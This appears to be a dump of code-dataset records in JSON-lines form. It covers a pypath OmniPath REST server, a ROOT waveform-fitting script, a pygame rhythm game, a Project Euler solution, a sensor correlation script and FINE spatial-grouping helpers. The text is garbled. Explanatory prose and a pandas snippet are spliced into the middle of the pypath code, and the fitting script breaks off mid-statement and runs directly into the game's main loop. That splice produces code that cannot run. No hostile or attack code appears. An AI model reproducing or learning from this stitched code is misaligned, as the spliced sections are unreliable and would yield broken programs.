req)\n\n\n def resources(self, req):\n\n datasets = (\n\n {\n self._query_type(dataset.decode('ascii'))\n for dataset in req.args[b'datasets']\n }\n\n if b'datasets' in req.args else\n\n None\n\n )\n\n res_ctrl = resources_mod.get_controller()\n license = self._get_license(req)\n\n return json.dumps(\n dict(\n (k, v)\n for k, v in iteritems(self._resources_dict)\n if (\n res_ctrl.license(k).enables(license) and\n (\n not datasets or\n datasets & set(v['datasets'].keys())\n )\n )\n )\n )\n\n\n\n @staticmethod\n def _get_license(req):\n\n return req.args[b'license'][0].decode('utf-8')\n\n\n @classmethod\n def 
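The topology filter above relies on DataFrame.query accepting bare boolean column names joined with 'or'. A small sketch of why that works:

import pandas as pd

tbl = pd.DataFrame({
    'secreted': [True, False, False],
    'plasma_membrane_transmembrane': [False, False, True],
})

# boolean columns are valid query expressions on their own:
print(tbl.query('secreted or plasma_membrane_transmembrane'))  # keeps rows 0 and 2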
_filter_by_license_complexes(cls, tbl, license):\n\n return cls._filter_by_license(\n tbl = tbl,\n license = license,\n res_col = 'sources',\n simple = False,\n prefix_col = 'identifiers',\n )\n\n\n @classmethod\n def _filter_by_license_interactions(cls, tbl, license):\n\n return cls._filter_by_license(\n tbl = tbl,\n license = license,\n res_col = 'sources',\n simple = False,\n prefix_col = 'references',\n )\n\n\n @classmethod\n def _filter_by_license_annotations(cls, tbl, license):\n\n return cls._filter_by_license(\n tbl = tbl,\n license = license,\n res_col = 'source',\n simple = True,\n )\n\n\n @classmethod\n def _filter_by_license_intercell(cls, tbl, license):\n\n return cls._filter_by_license(\n tbl = tbl,\n license = license,\n res_col = 'database',\n simple = True,\n )\n\n\n @staticmethod\n def _filter_by_license(\n tbl,\n license,\n res_col,\n simple = False,\n prefix_col = None,\n ):\n\n def filter_resources(res):\n\n res = {\n r for r in res\n if res_ctrl.license(r).enables(license)\n }\n\n composite = [\n r for r in res\n if res_ctrl.license(r).name == 'Composite'\n ]\n\n if composite:\n\n composite_to_remove = {\n comp_res\n for comp_res in composite\n if not res_ctrl.secondary_resources(comp_res, True) & res\n }\n\n res = res - composite_to_remove\n\n return res\n\n\n if license == LICENSE_IGNORE or tbl.shape[0] == 0:\n\n return tbl\n\n res_ctrl = resources_mod.get_controller()\n\n _res_col = getattr(tbl, res_col)\n\n if simple:\n\n bool_idx = [\n res_ctrl.license(res).enables(license)\n for res in _res_col\n ]\n\n else:\n\n _set_res_col = tbl.set_sources\n\n _res_to_keep = [\n filter_resources(ress)\n for ress in _set_res_col\n ]\n\n with ignore_pandas_copywarn():\n\n tbl[res_col] = [\n ';'.join(sorted(ress))\n for ress in _res_to_keep\n ]\n\n if prefix_col:\n\n _prefix_col = getattr(tbl, prefix_col)\n\n _new_prefix_col = [\n\n ';'.join(sorted(\n pref_res\n for pref_res in pref_ress.split(';')\n if (\n pref_res.split(':', maxsplit = 1)[0] in\n _res_to_keep[i]\n )\n ))\n\n if isinstance(pref_ress, common.basestring) else\n\n pref_ress\n\n for i, pref_ress in enumerate(_prefix_col)\n ]\n\n with ignore_pandas_copywarn():\n\n tbl[prefix_col] = _new_prefix_col\n\n bool_idx = [bool(res) for res in tbl[res_col]]\n\n tbl = tbl.loc[bool_idx]\n\n return tbl\n\n\n @classmethod\n def _serve_dataframe(cls, tbl, req):\n\n if b'limit' in req.args:\n\n limit = req.args[b'limit'][0].decode('utf-8')\n\n if limit.isdigit():\n\n limit = int(limit)\n tbl = tbl.head(limit)\n\n if b'format' in req.args and req.args[b'format'][0] == b'json':\n\n data_json = tbl.to_json(orient = 'records')\n # this is necessary because in the data frame we keep lists\n # as `;` separated strings but in json is nicer to serve\n # them as lists\n data_json = json.loads(data_json)\n\n for i in data_json:\n\n for k, v in iteritems(i):\n\n if k in cls.list_fields:\n\n i[k] = (\n [\n (\n int(f)\n if (\n k in cls.int_list_fields and\n f.isdigit()\n ) else\n f\n )\n for f in v.split(';')\n ]\n if isinstance(v, common.basestring) else\n []\n )\n\n return json.dumps(data_json)\n\n else:\n\n return tbl.to_csv(\n sep = '\\t',\n index = False,\n header = bool(req.args[b'header']),\n chunksize = 2e5,\n )\n\n\n @staticmethod\n def _args_set(req, arg):\n\n arg = arg.encode('utf-8')\n\n return (\n set(req.args[arg][0].decode('utf-8').split(','))\n if arg in req.args\n else set()\n )\n\n\nclass Rest(object):\n\n def __init__(\n self,\n port,\n serverclass = TableServer,\n start = True,\n **kwargs\n ):\n \"\"\"\n Runs a webserver 
serving a `PyPath` instance listening\n to a custom port.\n\n Args\n -----\n :param int port:\n The port to listen to.\n :param str serverclass'\n The class implementing the server.\n :param **kwargs:\n Arguments for initialization of the server class.\n \"\"\"\n\n self.port = port\n _log('Creating the server class.')\n self.server = serverclass(**kwargs)\n _log('Server class ready.')\n\n if start:\n\n _log('Starting the twisted server.')\n self.start()\n\n def start(self):\n\n self.site = TwistedWebSite(self.server)\n _log('Site created.')\n twisted_listen_tcp(self.port, self.site)\n _log('Server going to listen on port %u from now.' % self.port)\n twisted_run()\n","repo_name":"saezlab/pypath","sub_path":"pypath/omnipath/server/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":78989,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"37"} +{"seq_id":"42316947714","text":"#!/usr/bin/env python\n'''\nRoot to numpy converter (from file to file).\n\nTruncates the waveform to desired width. Applies the fit\n\n'''\n\nt_offset = 6.17742\n\ntemplate = None\nvec = None\n\n\n###\ndef tempfit(x, *par):\n w = x - par[1]\n return par[0]*np.interp(w, vec, template[:,1], left=0.0, right=0.0) + par[2]\n\n###################################\nimport uproot3\nimport numpy as np\nfrom numpy import loadtxt\n\nimport scipy\nfrom scipy.optimize import curve_fit\n\nimport argparse\n###################################\n# Input normalization\nnorm = np.array([4000, 16, 2000])\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"-i\", \"--infile\", type=str, help=\"Input ROOT file\", default='')\nparser.add_argument(\"-o\", \"--outfile\", type=str, help=\"Output numpy file\", default='')\n\nparser.add_argument(\"-T\", \"--tmplfile\", type=str, help=\"Fit template file\", default='template.csv')\n\nparser.add_argument(\"-N\", \"--entries\", type=int, help=\"Number of entries\", default=0)\nparser.add_argument(\"-c\", \"--channel\", type=int, help=\"Channel\", default=0)\n\n\nparser.add_argument(\"-t\", \"--threshold\",type=float, help=\"threshold\", default=0.0)\nparser.add_argument(\"-r\", \"--r2\", type=float, help=\"R2 threshold\", default=0.0)\n\nparser.add_argument(\"-f\", \"--normfactor\", type=float, help=\"Normalization factor\",default=1.0)\n\nparser.add_argument(\"-v\", \"--verbose\", action='store_true', help=\"Verbose mode\")\nparser.add_argument(\"-z\", \"--zip\", action='store_true', help=\"Store compressed\")\nparser.add_argument(\"-s\", \"--short\", action='store_true', help=\"Shorten the waveform (downsample)\")\nparser.add_argument(\"-w\", \"--window\", action='store_true', help=\"Narrow window the waveform\")\nparser.add_argument(\"-n\", \"--normalize\",action='store_true', help=\"Normalize input\")\nparser.add_argument(\"-p\", \"--peaktime\", action='store_true', help=\"Strict cut on peak time\")\n\nparser.add_argument(\"-d\", \"--debug\", action='store_true', help=\"Debug mode\")\n\n###################################\nargs = parser.parse_args()\n\ninfile = args.infile\noutfile = args.outfile\n\ntmplfile = args.tmplfile\n\nentries = args.entries\nverbose = args.verbose\n\ntreename = 'trainingtree'\nbranchname = 'waveform'\n\nchannel = args.channel\nthreshold = args.threshold\n\nnormalize = args.normalize\nnrm = args.normfactor\n\n#####################################\n\nnp.set_printoptions(precision=3, linewidth=80)\n\nif(infile==''):\n print('Please specify a valid input file name')\n exit(-1)\nfile = 
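Hypothetical usage of the Rest wrapper defined above; the port is arbitrary, and input_files falls back to TableServer.default_input_files when omitted:

# from pypath.omnipath.server.run import Rest
# Rest(8080)  # builds a TableServer, wraps it in a twisted Site
#             # and blocks in reactor.run()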
uproot3.open(infile)\n\n\nif verbose: print(f'''Will attempt to use the template file \"{tmplfile}\".''')\n\ntry:\n template = loadtxt(tmplfile, delimiter=',')\nexcept:\n print(\"Problem with reading template file, exiting\")\n exit(-1)\n\nif verbose:\n print(f'''Template dimensions: {template.shape}''')\n print(f'''Opened file \"{infile}\", will use tree \"{treename}\"''')\n\n\n# Translate the template \"x\" axis\nvec = template[:,0] - t_offset\n\ndir = file[treename]\nbranch = dir[branchname]\nNentries = branch.numentries\n\nN=Nentries if entries==0 else min(entries,Nentries)\n\nif verbose: print(f'''Will process {N} entries out of total {Nentries}''')\n\nX = branch.array()\ndims = X.shape\nif verbose : print(f'''Read an array: {dims}''')\n\nx = np.linspace(0, 31, 31, endpoint=False)\n\ncnt_bad, cnt_out, cnt_small, first, output_array = 0, 0, 0, True, None\n\nif normalize:\n param_bounds=([0.01, 3.0, 0.3],[10.0, 19.0, 2.5])\nelse:\n param_bounds=([20.0, 3.0, 1100.0],[14000.0, 25.0, 2400.0])\n\n\n\nindices = range(3, 31, 3)\n\nfor i in range(N): # loop over the data sample\n x = np.linspace(0, 31, 31, endpoint=False) # Keep it here!\n if (verbose and (i %100)==0 and i!=0): print(f'''Processed: {i} Percentage bad: {float(cnt_bad)/float(i)}''')\n\n frame = X[i] # select a row\n wave = frame[channel][0:31] # select waveform, 31 bin\n\n if args.short:\n wave = np.take(wave, indices)\n x = np.arange(3, 31, 3)\n\n\n maxindex = np.argmax(wave)\n maxval = wave[maxindex]\n \n if args.short: maxindex = x[maxindex]\n\n if args.window:\n if maxindex>25 or maxindex<5: # filter out outliers\n cnt_out+=1\n continue\n\n selection = np.arange(maxindex-4, maxindex+6)\n maxindex = x[maxindex]\n wave = np.take(wave, selection)\n x = selection\n\n\n if args.peaktime: # strict timing selection\n if maxindex>15 or maxindex<9: # filter out outliers\n cnt_out+=1\n continue\n \n ped_guess = np.average(wave[0:5]) # ped_guess = 1580 NB. 
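The fit this script prepares (tempfit interpolating a sampled template, curve_fit with bounds) can be exercised on synthetic data. A minimal sketch with a stand-in Gaussian template; all numbers are illustrative:

import numpy as np
from scipy.optimize import curve_fit

vec = np.linspace(0, 30, 61)
tmpl = np.exp(-0.5 * ((vec - 12.0) / 2.0) ** 2)  # stand-in template shape

def tempfit(x, amp, shift, ped):
    # scale and shift the sampled template, then add a pedestal
    return amp * np.interp(x - shift, vec, tmpl, left=0.0, right=0.0) + ped

x = np.arange(31)
y = tempfit(x, 3.0, 1.5, 2.0) + np.random.normal(0.0, 0.05, x.size)
popt, pcov = curve_fit(tempfit, x, y, p0=[1.0, 0.0, 2.0],
                       bounds=([0.01, -5.0, 0.0], [10.0, 5.0, 5.0]))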
Good guess for channel 27\n\n # -------------------------------------------------------------------------\n # Core fit:\n\n if normalize:\n wave = wave/nrm\n maxval = maxval/nrm\n ped_guess = ped_guess/nrm\n \n amp = float(maxval-ped_guess)\n\n\n if amp song_length+1:\r\n break # song is over\r\n\r\n if music_state and not music_started and now_time > 0:\r\n pygame.mixer.music.play() # start playing the song\r\n music_started = True\r\n\r\n if now_time > 0:\r\n # save the combo history as colors\r\n combo_prog = combo/len(notes)\r\n if combo_prog < 0.5:\r\n k = 1-(1-combo_prog*2)**2\r\n t = int(k*255)\r\n combo_his[int(1000*now_time/song_length)\r\n ] = (255-t, t, 255-t) # purple-green\r\n else:\r\n k = combo_prog*2-1\r\n t1 = int(k*255)\r\n t2 = int(k*40)\r\n combo_his[int(1000*now_time/song_length)\r\n ] = (t1, 255-t2, 0) # green-gold\r\n\r\n # Miss judgment and Autoplay\r\n for note in notes:\r\n if autoplay and now_beat > note.time and not note.click:\r\n note.clicktime = note.time\r\n play_sound[note.type]()\r\n note.click = 1\r\n c1 += 1\r\n combo += 1\r\n score += 10000 / len(notes)\r\n elif (now_beat-note.time)*beat > 0.35 and not note.click:\r\n note.click = -2\r\n c4 += 1\r\n combo = 0\r\n\r\n def show():\r\n # draw the chart\r\n show_bgpic()\r\n for note in notes:\r\n if -20 < getlinepos(now_beat)-10-(note.time-now_beat)*note.direction*getspeed(now_beat) < 600:\r\n if not note.click:\r\n # draw the note\r\n rect = pygame.Rect(\r\n 110*note.pos+10, getlinepos(now_beat)-10-(note.time-now_beat)*note.direction*getspeed(now_beat), 100, 20)\r\n if note.multi:\r\n # draw the multi-press hint\r\n rect2 = pygame.Rect(\r\n rect.left-2, rect.top-2, 104, 24)\r\n pygame.draw.rect(screen, (255, 255, 200),\r\n rect2, border_radius=5)\r\n pygame.draw.rect(screen, ((100, 150, 200), (200, 150, 100),\r\n (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)))[note.type],\r\n rect, border_radius=5)\r\n # draw the number hint\r\n text_num = font.render(\r\n str(int(note.pos+1)), True, (255, 255, 0))\r\n rect_num = text_num.get_rect()\r\n rect_num.center = rect.center\r\n screen.blit(text_num, rect_num)\r\n if now_beat-note.clicktime < 0.5 and note.click in (-1, 1, 2):\r\n # draw the hit effect\r\n size = (\r\n max(0, now_beat-note.clicktime)/0.5)**0.5*100\r\n rect = pygame.Rect(0, 0, size, size)\r\n rect.center = (110*note.pos+60,\r\n getlinepos(now_beat))\r\n pygame.draw.rect(\r\n screen, colors[note.click], rect, 5)\r\n\r\n # draw the lane split lines\r\n if show_split_line:\r\n for i in range(10):\r\n pygame.draw.line(\r\n screen, (100, 100, 100), (i*110+5, 0), (i*110+5, 600), 3)\r\n\r\n # draw the judgment line\r\n if c2+c3+c4 == 0:\r\n linecolor = 1\r\n elif c3+c4 == 0:\r\n linecolor = 2\r\n else:\r\n linecolor = -1\r\n pygame.draw.line(\r\n screen, colors[linecolor], (0, getlinepos(now_beat)), (1000, getlinepos(now_beat)), 5)\r\n\r\n # draw the progress bar\r\n for i in range(list(combo_his.keys())[-1]+1):\r\n if i not in combo_his:\r\n combo_his[i] = combo_his[i-1]\r\n pygame.draw.line(\r\n screen, combo_his[i], (i, 0), (i, 5), 1)\r\n\r\n # draw the text\r\n y = 600\r\n for i in reversed(song_name.split('\n')):\r\n text_name = font.render(i, True, (255, 255, 255))\r\n rect_name = text_name.get_rect()\r\n rect_name.bottomleft = (0, y)\r\n screen.blit(text_name, rect_name)\r\n y -= 30\r\n text_score = font.render(\r\n f'{str(round(score)).zfill(5)} | Combo: {combo}'+' (Autoplay)'*autoplay, True, (255, 255, 255))\r\n rect_score = text_score.get_rect()\r\n rect_score.midbottom = (500, 600)\r\n screen.blit(text_score, rect_score)\r\n screen.blit(text_diff, rect_diff)\r\n\r\n def pause():\r\n # pause\r\n if music_state:\r\n pygame.mixer.music.pause()\r\n 
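# Pause menu below: 'X' returns 1 (back to title), 'R' returns 2 (replay); a mouse click resumes play after a 3-second countdown.\r\n 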
rect_replay.midtop = (500, rect_continue.bottom+10)\r\n rect_return.midtop = (500, rect_replay.bottom+10)\r\n screen.blit(text_pause_big, rect_pause_big)\r\n screen.blit(text_continue, rect_continue)\r\n screen.blit(text_replay, rect_replay)\r\n screen.blit(text_return, rect_return)\r\n pygame.display.update()\r\n clicked = False\r\n while not clicked:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n sys.exit()\r\n elif event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_x:\r\n return 1\r\n elif event.key == pygame.K_r:\r\n return 2\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n clicked = True\r\n for i in range(3, 0, -1):\r\n show()\r\n text_num_big = font_big.render(\r\n str(i), True, (255, 255, 255))\r\n rect_num_big = text_num_big.get_rect()\r\n rect_num_big.center = (500, 300)\r\n screen.blit(text_num_big, rect_num_big)\r\n pygame.display.update()\r\n time.sleep(1)\r\n if music_started:\r\n pygame.mixer.music.unpause()\r\n\r\n # refresh the chart\r\n show()\r\n pygame.display.update()\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n # window closed, quit the game\r\n sys.exit()\r\n elif event.type == pygame.WINDOWFOCUSLOST and not autoplay or event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\r\n # window lost focus, pause the game\r\n t = pause()\r\n if t == 1: # return to the title screen\r\n return\r\n elif t == 2: # replay\r\n return game()\r\n else:\r\n start_time = time.time()-now_time-2\r\n elif event.type == pygame.KEYDOWN and pygame.K_1 <= event.key <= pygame.K_9:\r\n # number key pressed, hit the note\r\n if not autoplay:\r\n key = event.key-pygame.K_1\r\n for note in notes:\r\n delta = abs(now_beat-note.time)*beat # hit error in seconds\r\n if delta <= 0.35 and not note.click and note.pos == key:\r\n # valid hit\r\n note.clicktime = now_beat\r\n total_delta += now_beat-note.time\r\n play_sound[note.type]()\r\n if delta <= 0.08:\r\n # Perfect judgment\r\n note.click = 1\r\n c1 += 1\r\n combo += 1\r\n score += 10000 / len(notes) * \\\r\n (0.7+math.log(combo+1, c1+c2+c3+c4+1)*0.3)\r\n elif delta <= 0.2:\r\n # Good judgment\r\n note.click = 2\r\n c2 += 1\r\n combo += 1\r\n score += 10000 / len(notes)*(0.7 +\r\n math.log(combo+1, c1 + c2+c3+c4+1)*0.3)*(0.9-(delta-0.08)/0.12*0.3)\r\n else:\r\n # Bad judgment\r\n note.click = -1\r\n c3 += 1\r\n combo = 0\r\n break\r\n\r\n # grading\r\n if len(notes) == c1:\r\n letter = 'AP'\r\n elif c3+c4 == 0:\r\n letter = 'FC'\r\n elif score >= 9000:\r\n letter = 'S'\r\n elif score >= 8000:\r\n letter = 'A'\r\n elif score >= 7000:\r\n letter = 'B'\r\n elif score >= 6000:\r\n letter = 'C'\r\n else:\r\n letter = 'Fail'\r\n\r\n # show the results screen\r\n show_bgpic()\r\n y = 50\r\n for i in song_name.split('\n'):\r\n text_name_big = font_big.render(i, True, (255, 255, 255))\r\n rect_name_big = text_name_big.get_rect()\r\n rect_name_big.topleft = (50, y)\r\n screen.blit(text_name_big, rect_name_big)\r\n y = rect_name_big.bottom+10\r\n text_composer = font.render(song_composer, True, (255, 255, 255))\r\n rect_composer = text_composer.get_rect()\r\n rect_composer.topleft = (50, rect_name_big.bottom+10)\r\n text_diff = font.render(\r\n diff+' (Autoplay)'*autoplay, True, (255, 255, 255))\r\n rect_diff = text_diff.get_rect()\r\n rect_diff.topleft = (50, rect_composer.bottom+10)\r\n rect_return.bottomleft = (50, 550)\r\n rect_replay.bottomleft = (50, rect_return.top-10)\r\n screen.blit(text_name_big, rect_name_big)\r\n screen.blit(text_composer, rect_composer)\r\n screen.blit(text_diff, rect_diff)\r\n screen.blit(text_return, rect_return)\r\n screen.blit(text_replay, rect_replay)\r\n 
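# The grade letter computed above (AP/FC/S/A/B/C/Fail) selects the matching image <letter>.png from the Resources folder.\r\n 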
img_letter = pygame.image.load(\r\n os.path.join(Resources, letter+'.png'))\r\n rect_letter = img_letter.get_rect()\r\n rect_letter.midtop = (865, 50)\r\n text_score_big = font_big.render(\r\n str(round(score)).zfill(5), True, (255, 255, 255))\r\n rect_score_big = text_score_big.get_rect()\r\n rect_score_big.midtop = (865, rect_letter.bottom)\r\n screen.blit(img_letter, rect_letter)\r\n screen.blit(text_score_big, rect_score_big)\r\n for line in range(len(combo_his)//4):\r\n pygame.draw.line(\r\n screen, combo_his[line*4], (line+740, rect_score_big.bottom+10), (line+740, rect_score_big.bottom+25), 1)\r\n text_perfect = font.render(f'Perfect: {c1}', True, colors[1])\r\n rect_perfect = text_perfect.get_rect()\r\n rect_perfect.midtop = (865, rect_score_big.bottom+35)\r\n text_good = font.render(f'Good: {c2}', True, colors[2])\r\n rect_good = text_good.get_rect()\r\n rect_good.midtop = (865, rect_perfect.bottom+10)\r\n text_bad = font.render(f'Bad: {c3}', True, colors[-1])\r\n rect_bad = text_bad.get_rect()\r\n rect_bad.midtop = (865, rect_good.bottom+10)\r\n text_miss = font.render(f'Miss: {c4}', True, colors[-2])\r\n rect_miss = text_miss.get_rect()\r\n rect_miss.midtop = (865, rect_bad.bottom+10)\r\n text_total = font.render(\r\n f'Total: {len(notes)}', True, (255, 255, 255))\r\n rect_total = text_total.get_rect()\r\n rect_total.midtop = (865, rect_miss.bottom+10)\r\n text_delta = font.render(\r\n f'Delta: {round(total_delta/(c1+c2+c3)*1000) if c1+c2+c3 else 0}ms', True, (255, 255, 255))\r\n rect_delta = text_delta.get_rect()\r\n rect_delta.midtop = (865, rect_total.bottom+10)\r\n screen.blit(text_perfect, rect_perfect)\r\n screen.blit(text_good, rect_good)\r\n screen.blit(text_bad, rect_bad)\r\n screen.blit(text_miss, rect_miss)\r\n screen.blit(text_total, rect_total)\r\n screen.blit(text_delta, rect_delta)\r\n screen.blit(img_logo, rect_logo)\r\n pygame.display.update()\r\n\r\n # wait for user input\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n sys.exit()\r\n elif event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_x:\r\n return\r\n elif event.key == pygame.K_r:\r\n return game()\r\n\r\n game()\r\n","repo_name":"Lucker-Studio/Lucking-Legacy","sub_path":"Lucking-v1.0-Beta-13.py","file_name":"Lucking-v1.0-Beta-13.py","file_ext":"py","file_size_in_byte":32593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7361239778","text":"# def clac_sum(*args):\n# ax = 0\n# for n in args:\n# ax = ax + n\n# return ax\n\n# calling this function returns the summing function itself, not the result of the sum\ndef lazy_sum(*args):\n def sum():\n ax = 0\n for n in args:\n ax = ax + n\n return ax\n return sum\n\nf = lazy_sum(1, 3, 5, 7, 9)\nl = f()\nprint(l)\n","repo_name":"yunyusha/xunxibiji","sub_path":"text/liaoxuefeng/fmakere.py","file_name":"fmakere.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25067301290","text":"t_mem = {}\ns_mem = {1: 1, 2: 1, 3: 1, 4: 2}\n\ndef s(n):\n \"Number of palindromes summing to n which do not contain 2\"\n if n in s_mem:\n return s_mem[n]\n else:\n result = 2 - (n % 2)\n if n % 2 == 1:\n i = 1\n while n - 2*i > 0:\n if i != 2:\n result += s(n-2*i)\n i += 1\n else:\n i = 1\n while n - 2*i > 0:\n if i != 2:\n result += s(n-2*i)\n i += 1\n s_mem[n] = result\n return result\n\ni = 44\nmod = 10**6\ntotal = pow(2, 22, mod)\ns_list = [s(i - 6), s(i - 4), s(i-2), s(i)]\nt = (total - s_list[-1]) % mod\n
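# The loop below advances i by 2 each step, computing the next s value from s(i-6), s(i-2) and s(i)\n# via a sliding window (apparently relying on a linear recurrence for s); 'total' tracks 2**(i//2)\n# mod 10**6, and the search stops as soon as the two agree modulo 10**6.\n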
while t != 0:\n total = (total * 2) % mod\n s_list = s_list[1:] + [(s_list[0] + s_list[2] + s_list[3]) % mod]\n t = (total - s_list[-1]) % mod\n i += 2\nprint(i)\n","repo_name":"arnet95/Project-Euler","sub_path":"euler710.py","file_name":"euler710.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72695274987","text":"import pickle\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport pandas as pd\nfrom pandas.plotting import scatter_matrix\nfrom bnn.seed import bae_set_seed\n\nbae_set_seed(100)\n\nplt.style.use('ggplot')\n\ntotal_sensors = 17\nsensor_names = [\"ts1\",\"ts2\",\"ts3\",\"ts4\",\"vs1\",\"se\",\"ce\",\"cp\"]+[\"fs1\",\"fs2\"]+[\"ps1\",\"ps2\",\"ps3\",\"ps4\",\"ps5\",\"ps6\",\"eps1\"]\n\npickle_path=\"pickles/\"\ndata_raw = pickle.load(open(pickle_path+\"data_ft_resampled.p\", \"rb\" ) )\nx_train, x_test, x_ood, x_test_noise,x_test_drift, = data_raw['x_train'], data_raw['x_test'], data_raw['x_ood'], data_raw['x_test_noise'], data_raw['x_test_drift']\ny_train, y_test, y_ood = data_raw['y_train'], data_raw['y_test'], data_raw['y_ood']\n\ndef get_corr_data(x_data,label=\"train\"):\n #put into df\n x_flatten = x_data.reshape(-1,17) # use the passed-in data, not the global x_ood\n df = pd.DataFrame(x_flatten)\n df.columns = sensor_names\n #correlation\n correlation_table = df.corr()\n print(correlation_table)\n plt.matshow(correlation_table)\n plt.xticks(range(len(df.columns)), df.columns)\n plt.yticks(range(len(df.columns)), df.columns)\n plt.colorbar()\n plt.savefig(label+\"_correlation_table.png\") # save before show, so the saved figure is not blank\n plt.show()\n\n #save csv\n correlation_table.to_csv(label+\"_correlation_table.csv\")\n\n return correlation_table\n\nget_corr_data(x_train,\"healthy\")\nget_corr_data(x_ood,\"faulty\")\n\nfor num_sensor in range(len(x_test_noise)):\n for id_,noise_level in enumerate(('0', '5', '10', '15', '20', '25')):\n if num_sensor == 10:\n get_corr_data(x_test_noise[num_sensor][id_],\"noise\"+str(noise_level)+\"_sensor\"+str(num_sensor))\n\nfor num_sensor in range(len(x_test_drift)):\n for id_,drift_level in enumerate(('0', '5', '10', '15', '20', '25')):\n if num_sensor == 10:\n get_corr_data(x_test_drift[num_sensor][id_],\"drift\"+str(drift_level)+\"_sensor\"+str(num_sensor))\n\n\n#put into df\nx_flatten = x_ood.reshape(-1,17)\ndf = pd.DataFrame(x_flatten)\ndf.columns = sensor_names\n\n#plot correlation\nsensor_i1 =3\nsensor_i2 =1\nnum_sample=0\nplt.figure()\nplt.scatter(x_flatten[:,sensor_i1].flatten(),x_flatten[:,sensor_i2].flatten())\n\n\n#entire scatter matrix\n#very computationally intensive\nplot_full_scatter = False\nif plot_full_scatter:\n plt.figure()\n scatter_matrix(df, figsize=(8, 8), diagonal='kde')\n plt.show()\n\n#correlation\ncorrelation_table = df.corr()\nprint(correlation_table)\nplt.matshow(correlation_table)\nplt.xticks(range(len(df.columns)), df.columns)\nplt.yticks(range(len(df.columns)), df.columns)\nplt.colorbar()\nplt.savefig(\"correlation_table.png\")\nplt.show()\n\n#save csv\ncorrelation_table.to_csv(\"correlation_table.csv\")\n\n","repo_name":"bangxiangyong/bae-drift-detection-zema-hydraulic","sub_path":"subanalysis/calc_correlation.py","file_name":"calc_correlation.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"561648677","text":"\"\"\"Functions to assist spatial grouping algorithms. 
\n\"\"\"\nimport warnings\nimport numpy as np\nfrom scipy.cluster import hierarchy\nfrom FINE.IOManagement.utilsIO import PowerDict\n\ntry:\n import geopandas as gpd\nexcept ImportError:\n warnings.warn(\n \"The package geopandas is not installed. Spatial aggregation cannot be used without it.\"\n )\n\n\ndef get_normalized_array(array):\n \"\"\"\n Normalizes the given array to [0,1].\n\n :param array: Array to be normalized\n :type array: np.ndarray\n\n :returns: Normalized array\n :rtype: np.ndarray\n \"\"\"\n\n norm_min, norm_max = 0, 1\n\n if np.max(array) == np.min(array):\n return np.ones(array.shape)\n\n return ((array - np.min(array)) / (np.max(array) - np.min(array))) * (\n norm_max - norm_min\n ) + norm_min\n\n\ndef preprocess_time_series(vars_dict):\n \"\"\"\n Preprocesses time series variables.\n\n :param vars_dict: For each key (variable name), the corresponding value is a dictionary. This dictionary\n consists of each component name and the corresponding xr.DataArray.\n - Dimensions of xr.DataArray - 'time', 'space'\n :type vars_dict: Dict[str, Dict[str, xr.DataArray]]\n\n :returns: processed_ts_dict - For each key (variable name), the corresponding value is a dictionary. This dictionary\n consists of each component name and the corresponding normalized data matrix\n - Size of each matrix: n_timesteps * n_regions\n :rtype: Dict[str, Dict[str, np.ndarray]]\n \"\"\"\n\n processed_ts_dict = {}\n\n for var_name, var_dict in vars_dict.items():\n processed_ts_dict.update({var_name: {}})\n\n # For each component, normalize the corresponding matrix. Add to resulting dict\n for comp_name, da in var_dict.items():\n norm_comp_matrix = get_normalized_array(da.values)\n\n processed_ts_dict.get(var_name).update({comp_name: norm_comp_matrix})\n\n return processed_ts_dict\n\n\ndef preprocess_1d_variables(vars_dict):\n \"\"\"\n Preprocesses 1-dimensional variables.\n\n :param vars_dict: For each key (variable name), the corresponding value is a dictionary. This dictionary\n consists of each component name and the corresponding xr.DataArray.\n - Dimensions of xr.DataArray - 'space'\n :type vars_dict: Dict[str, Dict[str, xr.DataArray]]\n\n :returns: processed_1d_dict - For each key (variable name), the corresponding value is a dictionary. This dictionary\n consists of each component name and the corresponding normalized data array\n - Size of each array: n_regions\n :rtype: Dict[str, Dict[str, np.ndarray]]\n \"\"\"\n\n processed_1d_dict = {}\n\n for var_name, var_dict in vars_dict.items():\n processed_1d_dict.update({var_name: {}})\n\n # For each component, normalize the corresponding matrix. Add to resulting dict\n for comp_name, da in var_dict.items():\n norm_comp_array = get_normalized_array(da.values)\n\n processed_1d_dict.get(var_name).update({comp_name: norm_comp_array})\n\n return processed_1d_dict\n\n\ndef preprocess_2d_variables(vars_dict):\n \"\"\"\n Preprocesses 2-dimensional variables.\n\n :param vars_dict: For each key (variable name), the corresponding value is a dictionary. This dictionary consists of\n each component name and the corresponding xr.DataArray.\n - Dimensions of xr.DataArray - 'space','space_2'\n :type vars_dict: Dict[str, Dict[str, xr.DataArray]]\n\n :returns: processed_2d_dict - For each key (variable name), the corresponding value is a dictionary. 
